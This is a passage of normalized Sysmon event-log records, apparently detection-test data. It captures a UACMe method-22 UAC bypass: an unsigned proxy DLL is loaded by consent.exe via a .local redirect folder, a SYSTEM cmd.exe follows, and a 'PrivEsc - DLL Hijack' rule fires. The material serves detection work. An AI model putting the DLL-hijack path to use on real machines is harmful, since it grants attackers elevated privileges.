"00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.363Z", "type": "raw", "uuid": "4d0abd6d-a99b-4817-a3e0-6438c1b28920" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.9545970Z\"},\"EventRecordID\":\"5450\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:21.036\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7935-5d45-0000-001066ca0701}\"},{\"Name\":\"ProcessId\",\"text\":\"7324\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 7564 -s 152\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 7564 -s 152", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7935-5d45-0000-001066ca0701", "object.process.hash.imphash": "3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "7324", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:21.036Z", "type": "raw", "uuid": "d6803be2-c89f-4b40-acdb-cf8c80989d3f" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.1282657Z\"},\"EventRecordID\":\"5449\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.686\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7564", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.686Z", "type": "raw", "uuid": "7b523ccd-78ce-4af3-8d35-9273f3f6a8da" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:20.7314164Z\"},\"EventRecordID\":\"5448\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.405\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010a2a40701}\"},{\"Name\":\"ProcessId\",\"text\":\"4964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010a2a40701", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4964", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.405Z", "type": "raw", "uuid": "a47d229a-2311-48b1-a1ed-bdd13d9c59e0" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.9151203Z\"},\"EventRecordID\":\"5447\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.888\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7933-5d45-0000-0010227e0701}\"},{\"Name\":\"ProcessId\",\"text\":\"6000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7933-5d45-0000-0010227e0701", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "6000", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.888Z", "type": "raw", "uuid": "b0eb41f3-3f63-4905-ba70-8743cd7bce72" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.8880688Z\"},\"EventRecordID\":\"5446\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3680\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.877\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "subject.process.id": "4740", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.877Z", "type": "raw", "uuid": "96aa7248-d4dd-4f79-96d5-69b12da589c5" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.8537652Z\"},\"EventRecordID\":\"5445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001085ee0601}\"},{\"Name\":\"ProcessId\",\"text\":\"6388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 4740 -s 128\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": 